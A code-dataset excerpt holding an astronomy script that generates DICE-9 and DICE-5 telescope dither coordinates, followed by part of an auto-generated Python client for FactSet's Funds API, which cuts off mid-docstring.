random_dither.py
|
AstroHuntsman/signal-to-noise
|
231d9e73bdfbcd761630cdfcf675dfa8278aac1f
|
[
"MIT"
] | null | null | null |
random_dither.py
|
AstroHuntsman/signal-to-noise
|
231d9e73bdfbcd761630cdfcf675dfa8278aac1f
|
[
"MIT"
] | null | null | null |
random_dither.py
|
AstroHuntsman/signal-to-noise
|
231d9e73bdfbcd761630cdfcf675dfa8278aac1f
|
[
"MIT"
] | 1
|
2016-12-08T05:04:27.000Z
|
2016-12-08T05:04:27.000Z
|
# coding: utf-8
# # LOOPING DICE-9
# In[1]:
import numpy as np
import astropy.units as u
from astropy.coordinates import SkyCoord
import itertools
import math
import random
import matplotlib.pyplot as plt
def dither_dice9(ra_dec, pattern_offset, random_offset=0 * u.arcsec, loop=9, plot=False):
"""Dithering for 9 points
Creates a square of 8 points around the central designated point. Then there is a random selection
in a small region around the designated points in the dither list such that no point is selected twice,
to produce a more accurate image.
Args:
ra_dec (SkyCoord of Object): a RA and DEC created using 'SkyCoord'
pattern_offset (float): an offset for how far around the point you would like to dither.
random_offset (float, optional): an offset for the defined small region around the points defined in the dither list. Default is 0*u.arcsec
loop (int, optional): a loop for how many times you would like to dither with the DICE_9 pattern. Default is 9 loop.
plot (False, optional): a True or False input to say if user would like to plot coordinates. Default is False (no plot)
Returns:
All: returns 'SkyCoord' as a list and a plot of coordinate positions
"""
if not isinstance(pattern_offset, u.Quantity):
pattern_offset = pattern_offset * u.arcsec
if not isinstance(random_offset, u.Quantity):
random_offset = random_offset * u.arcsec
ra = ra_dec.ra
dec = ra_dec.dec
number = math.ceil(loop / 9.0)
# 0.5*2**0.5 is due to adjacent side in a right angle triangle (cos45)
pattern_ra = (((0.5 * 2 ** 0.5) * pattern_offset) * 0.5) / (np.cos(dec))
pattern = ((0.5 * 2 ** 0.5) * pattern_offset) * 0.5
random_ra = (random_offset * 0.5) / (np.cos(dec))
random_dec = (random_offset * 0.5)
# Dither
RA_list = [ra]
DEC_list = [dec]
for i in range(number):
ra1 = ra + (pattern_ra)
RA_list.append(ra1)
dec1 = dec + (pattern)
DEC_list.append(dec1)
ra2 = ra + (pattern_ra)
RA_list.append(ra2)
DEC_list.append(dec)
ra3 = ra + (pattern_ra)
RA_list.append(ra3)
dec3 = dec - (pattern)
DEC_list.append(dec3)
RA_list.append(ra)
dec4 = dec - (pattern)
DEC_list.append(dec4)
ra5 = ra - (pattern_ra)
RA_list.append(ra5)
dec5 = dec - (pattern)
DEC_list.append(dec5)
ra6 = ra - (pattern_ra)
RA_list.append(ra6)
DEC_list.append(dec)
ra7 = ra - (pattern_ra)
RA_list.append(ra7)
dec7 = dec + (pattern)
DEC_list.append(dec7)
RA_list.append(ra)
dec8 = dec + (pattern)
DEC_list.append(dec8)
RA_list.append(ra)
DEC_list.append(dec)
RA_final_list = RA_list[:loop]
DEC_final_list = DEC_list[:loop]
# Random
LISTra = []
LISTdec = []
for i in range(0, len(RA_final_list)):
RA_offset = random.uniform(RA_final_list[i] - (random_ra), RA_final_list[i] + (random_ra))
LISTra.append(RA_offset)
DEC_offset = random.uniform(DEC_final_list[i] - (random_dec), DEC_final_list[i] + (random_dec))
LISTdec.append(DEC_offset)
All = SkyCoord(LISTra, LISTdec)
if plot is True:
plt.plot(All.ra, All.dec, 'c-s')
plt.ylabel('Declination [deg]')
plt.xlabel('Right Ascension [deg]')
plt.show()
return All
# # LOOPING DICE-5
# In[2]:
def dither_dice5(ra_dec, pattern_offset, random_offset=0 * u.arcsec, loop=5, plot=False):
"""Dithering for 5 points
Creates a square of 4 points around the central designated point. Then there is a random selection
in a small region around the designated points in the dither list such that no point is selected twice,
to produce a more accurate image.
Args:
ra_dec (SkyCoord of Object): a RA and DEC created using 'SkyCoord'
pattern_offset (float): an offset for how far around the point you would like to dither.
random_offset (float, optional): an offset for the defined small region around the points defined in the dither list. Default is 0*u.arcsec
loop (int, optional): a loop for how many times you would like to dither with the DICE_5 pattern. Default is 5 loop.
plot (False, optional): a True or False input to say if user would like to plot coordinates. Default is False (no plot)
Returns:
All: returns 'SkyCoord' as a list and a plot of coordinate positions
"""
if not isinstance(pattern_offset, u.Quantity):
pattern_offset = pattern_offset * u.arcsec
if not isinstance(random_offset, u.Quantity):
random_offset = random_offset * u.arcsec
ra = ra_dec.ra
dec = ra_dec.dec
number = math.ceil(loop / 5.0)
# 0.5*2**0.5 is due to adjacent side in a right angle triangle (cos45)
pattern_ra = (((0.5 * 2 ** 0.5) * pattern_offset) * 0.5) / (np.cos(dec))
pattern = ((0.5 * 2 ** 0.5) * pattern_offset) * 0.5
random_ra = (random_offset * 0.5) / (np.cos(dec))
random_dec = (random_offset * 0.5)
# Dither
RA_list = [ra]
DEC_list = [dec]
for i in range(number):
ra1 = ra + (pattern_ra)
RA_list.append(ra1)
dec1 = dec + (pattern)
DEC_list.append(dec1)
ra2 = ra + (pattern_ra)
RA_list.append(ra2)
dec2 = dec - (pattern)
DEC_list.append(dec2)
ra3 = ra - (pattern_ra)
RA_list.append(ra3)
dec3 = dec - (pattern)
DEC_list.append(dec3)
ra4 = ra - (pattern_ra)
RA_list.append(ra4)
dec4 = dec + (pattern)
DEC_list.append(dec4)
RA_list.append(ra)
DEC_list.append(dec)
RA_final_list = RA_list[:loop]
DEC_final_list = DEC_list[:loop]
# Random
LISTra = []
LISTdec = []
for i in range(0, len(RA_final_list)):
RA_offset = random.uniform(RA_final_list[i] - (random_ra), RA_final_list[i] + (random_ra))
LISTra.append(RA_offset)
DEC_offset = random.uniform(DEC_final_list[i] - (random_dec), DEC_final_list[i] + (random_dec))
LISTdec.append(DEC_offset)
All = SkyCoord(LISTra, LISTdec)
if plot is True:
plt.plot(All.ra, All.dec, 'c-s')
plt.ylabel('Declination [deg]')
plt.xlabel('Right Ascension [deg]')
plt.show()
return All
| 34.643243
| 147
| 0.633796
| 966
| 6,409
| 4.064182
| 0.146998
| 0.071319
| 0.042792
| 0.033113
| 0.896587
| 0.861946
| 0.838512
| 0.82272
| 0.82272
| 0.82272
| 0
| 0.024778
| 0.263224
| 6,409
| 184
| 148
| 34.831522
| 0.80665
| 0.317366
| 0
| 0.735043
| 0
| 0
| 0.019281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017094
| false
| 0
| 0.059829
| 0
| 0.094017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39bf9e9535a3f026d3642f900545af7b569bfe93
| 154,972
|
py
|
Python
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/api/fund_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/api/fund_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/api/fund_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
Funds API For Digital Portals
Search for mutual funds and ETFs using one single consolidated API, including a criteria-based screener. The API provides also base data, key figures, and holdings. A separate endpoint returns the possible values and value range for the parameters that the endpoint /fund/notation/screener/search accepts: Application developers can request the values and value range only for a restricted set of notations that match predefined parameters. This functionality may be used to pre-fill the values and value ranges of the parameters of the /fund/notation/screener/search endpoint so that performing a search always leads to a non-empty set of notations. This API is fully integrated with the corresponding Quotes API, allowing access to detailed price and performance information of instruments, as well as basic security identifier cross-reference. For direct access to price histories, please refer to the Time Series API for Digital Portals. Similar criteria based screener APIs exist for equity instruments and securitized derivatives: See the Stocks API and the Securitized Derivatives API for details. # noqa: E501
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.FundsAPIforDigitalPortals.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.FundsAPIforDigitalPortals.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.FundsAPIforDigitalPortals.exceptions import ApiException
from fds.sdk.FundsAPIforDigitalPortals.model.inline_object import InlineObject
from fds.sdk.FundsAPIforDigitalPortals.model.inline_object1 import InlineObject1
from fds.sdk.FundsAPIforDigitalPortals.model.inline_object2 import InlineObject2
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response200 import InlineResponse200
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2001 import InlineResponse2001
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2002 import InlineResponse2002
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2003 import InlineResponse2003
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2004 import InlineResponse2004
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2005 import InlineResponse2005
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2006 import InlineResponse2006
class FundApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.get_fund_holding_list_by_instrument_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse200,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/holding/listByInstrument',
'operation_id': 'get_fund_holding_list_by_instrument',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'attributes',
'sort',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
'sort',
],
'validation': [
'attributes',
'sort',
]
},
root_map={
'validations': {
('attributes',): {
'max_items': 50,
},
('sort',): {
'max_items': 2,
},
},
'allowed_values': {
('sort',): {
"HOLDINGS.NAME": "holdings.name",
"-HOLDINGS.NAME": "-holdings.name",
"HOLDINGS.WEIGHT": "holdings.weight",
"-HOLDINGS.WEIGHT": "-holdings.weight"
},
},
'openapi_types': {
'id':
(str,),
'attributes':
([str],),
'sort':
([str],),
},
'attribute_map': {
'id': 'id',
'attributes': '_attributes',
'sort': '_sort',
},
'location_map': {
'id': 'query',
'attributes': 'query',
'sort': 'query',
},
'collection_format_map': {
'attributes': 'csv',
'sort': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2002,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/keyFigures/benchmark/month/1/get',
'operation_id': 'get_fund_notation_key_figures_benchmark_month_1_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'id_notation_benchmark',
'attributes',
'language',
],
'required': [
'id',
'id_notation_benchmark',
],
'nullable': [
],
'enum': [
],
'validation': [
'id_notation_benchmark',
'attributes',
'language',
]
},
root_map={
'validations': {
('id_notation_benchmark',): {
'max_items': 100,
'min_items': 1,
},
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'id_notation_benchmark':
([str],),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'id_notation_benchmark': 'idNotationBenchmark',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'id_notation_benchmark': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'id_notation_benchmark': 'csv',
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2002,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/keyFigures/benchmark/month/3/get',
'operation_id': 'get_fund_notation_key_figures_benchmark_month_3_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'id_notation_benchmark',
'attributes',
'language',
],
'required': [
'id',
'id_notation_benchmark',
],
'nullable': [
],
'enum': [
],
'validation': [
'id_notation_benchmark',
'attributes',
'language',
]
},
root_map={
'validations': {
('id_notation_benchmark',): {
'max_items': 100,
'min_items': 1,
},
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'id_notation_benchmark':
([str],),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'id_notation_benchmark': 'idNotationBenchmark',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'id_notation_benchmark': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'id_notation_benchmark': 'csv',
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2003,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/keyFigures/benchmark/week/1/get',
'operation_id': 'get_fund_notation_key_figures_benchmark_week_1_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'id_notation_benchmark',
'attributes',
'language',
],
'required': [
'id',
'id_notation_benchmark',
],
'nullable': [
],
'enum': [
],
'validation': [
'id_notation_benchmark',
'attributes',
'language',
]
},
root_map={
'validations': {
('id_notation_benchmark',): {
'max_items': 100,
'min_items': 1,
},
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'id_notation_benchmark':
([str],),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'id_notation_benchmark': 'idNotationBenchmark',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'id_notation_benchmark': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'id_notation_benchmark': 'csv',
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2002,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/keyFigures/benchmark/year/1/get',
'operation_id': 'get_fund_notation_key_figures_benchmark_year_1_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'id_notation_benchmark',
'attributes',
'language',
],
'required': [
'id',
'id_notation_benchmark',
],
'nullable': [
],
'enum': [
],
'validation': [
'id_notation_benchmark',
'attributes',
'language',
]
},
root_map={
'validations': {
('id_notation_benchmark',): {
'max_items': 100,
'min_items': 1,
},
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'id_notation_benchmark':
([str],),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'id_notation_benchmark': 'idNotationBenchmark',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'id_notation_benchmark': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'id_notation_benchmark': 'csv',
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2002,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/keyFigures/benchmark/year/3/get',
'operation_id': 'get_fund_notation_key_figures_benchmark_year_3_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'id_notation_benchmark',
'attributes',
'language',
],
'required': [
'id',
'id_notation_benchmark',
],
'nullable': [
],
'enum': [
],
'validation': [
'id_notation_benchmark',
'attributes',
'language',
]
},
root_map={
'validations': {
('id_notation_benchmark',): {
'max_items': 100,
'min_items': 1,
},
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'id_notation_benchmark':
([str],),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'id_notation_benchmark': 'idNotationBenchmark',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'id_notation_benchmark': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'id_notation_benchmark': 'csv',
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2002,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/keyFigures/benchmark/year/5/get',
'operation_id': 'get_fund_notation_key_figures_benchmark_year_5_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'id_notation_benchmark',
'attributes',
'language',
],
'required': [
'id',
'id_notation_benchmark',
],
'nullable': [
],
'enum': [
],
'validation': [
'id_notation_benchmark',
'attributes',
'language',
]
},
root_map={
'validations': {
('id_notation_benchmark',): {
'max_items': 100,
'min_items': 1,
},
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'id_notation_benchmark':
([str],),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'id_notation_benchmark': 'idNotationBenchmark',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'id_notation_benchmark': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'id_notation_benchmark': 'csv',
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_fund_share_class_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2006,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/shareClass/get',
'operation_id': 'get_fund_share_class_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
'attributes',
'language',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
'attributes',
'language',
]
},
root_map={
'validations': {
('attributes',): {
'max_items': 50,
},
('language',): {
'max_length': 2,
'min_length': 2,
},
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'attributes':
([str],),
'language':
(str,),
},
'attribute_map': {
'id': 'id',
'attributes': '_attributes',
'language': '_language',
},
'location_map': {
'id': 'query',
'attributes': 'query',
'language': 'query',
},
'collection_format_map': {
'attributes': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.post_fund_issuer_search_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2001,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/issuer/search',
'operation_id': 'post_fund_issuer_search',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(InlineObject,),
},
'attribute_map': {
},
'location_map': {
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.post_fund_notation_screener_search_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2004,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/screener/search',
'operation_id': 'post_fund_notation_screener_search',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(InlineObject1,),
},
'attribute_map': {
},
'location_map': {
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.post_fund_notation_screener_value_ranges_get_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (InlineResponse2005,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/fund/notation/screener/valueRanges/get',
'operation_id': 'post_fund_notation_screener_value_ranges_get',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(InlineObject2,),
},
'attribute_map': {
},
'location_map': {
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def get_fund_holding_list_by_instrument(
self,
id,
**kwargs
) -> InlineResponse200:
"""Holdings of a fund. # noqa: E501
Holdings of a fund. Only the top 10 holdings with regard to their weighting in the fund portfolio are returned. Therefore, the weights of the holdings do not add up to 1 (i.e. 100%). # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of an instrument of a fund share class.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
sort ([str]): Sortable attributes. The sort order is ascending unless it is prefixed with a minus sign, in which case it is descending. A list of at most 2 (possibly prefixed) attribute name(s) is allowed.. [optional] if omitted the server will use the default value of ["-holdings.weight"]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse200
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_holding_list_by_instrument_with_http_info(
self,
id,
**kwargs
) -> typing.Tuple[InlineResponse200, int, typing.MutableMapping]:
"""Holdings of a fund. # noqa: E501
Holdings of a fund. Only the top 10 holdings with regard to their weighting in the fund portfolio are returned. Therefore, the weights of the holdings do not add up to 1 (i.e. 100%). # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of an instrument of a fund share class.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
sort ([str]): Sortable attributes. The sort order is ascending unless it is prefixed with a minus sign, in which case it is descending. A list of at most 2 (possibly prefixed) attribute name(s) is allowed.. [optional] if omitted the server will use the default value of ["-holdings.weight"]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse200
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_holding_list_by_instrument_async(
self,
id,
**kwargs
) -> "ApplyResult[InlineResponse200]":
"""Holdings of a fund. # noqa: E501
Holdings of a fund. Only the top 10 holdings with regard to their weighting in the fund portfolio are returned. Therefore, the weights of the holdings do not add up to 1 (i.e. 100%). # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of an instrument of a fund share class.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
sort ([str]): Sortable attributes. The sort order is ascending unless it is prefixed with a minus sign, in which case it is descending. A list of at most 2 (possibly prefixed) attribute name(s) is allowed.. [optional] if omitted the server will use the default value of ["-holdings.weight"]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse200]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_holding_list_by_instrument_with_http_info_async(
self,
id,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse200, int, typing.MutableMapping]]":
"""Holdings of a fund. # noqa: E501
Holdings of a fund. Only the top 10 holdings with regard to their weighting in the fund portfolio are returned. Therefore, the weights of the holdings do not add up to 1 (i.e. 100%). # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of an instrument of a fund share class.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
sort ([str]): Sortable attributes. The sort order is ascending unless it is prefixed with a minus sign, in which case it is descending. A list of at most 2 (possibly prefixed) attribute name(s) is allowed.. [optional] if omitted the server will use the default value of ["-holdings.weight"]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse200, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get(
self,
id,
id_notation_benchmark,
**kwargs
) -> InlineResponse2002:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
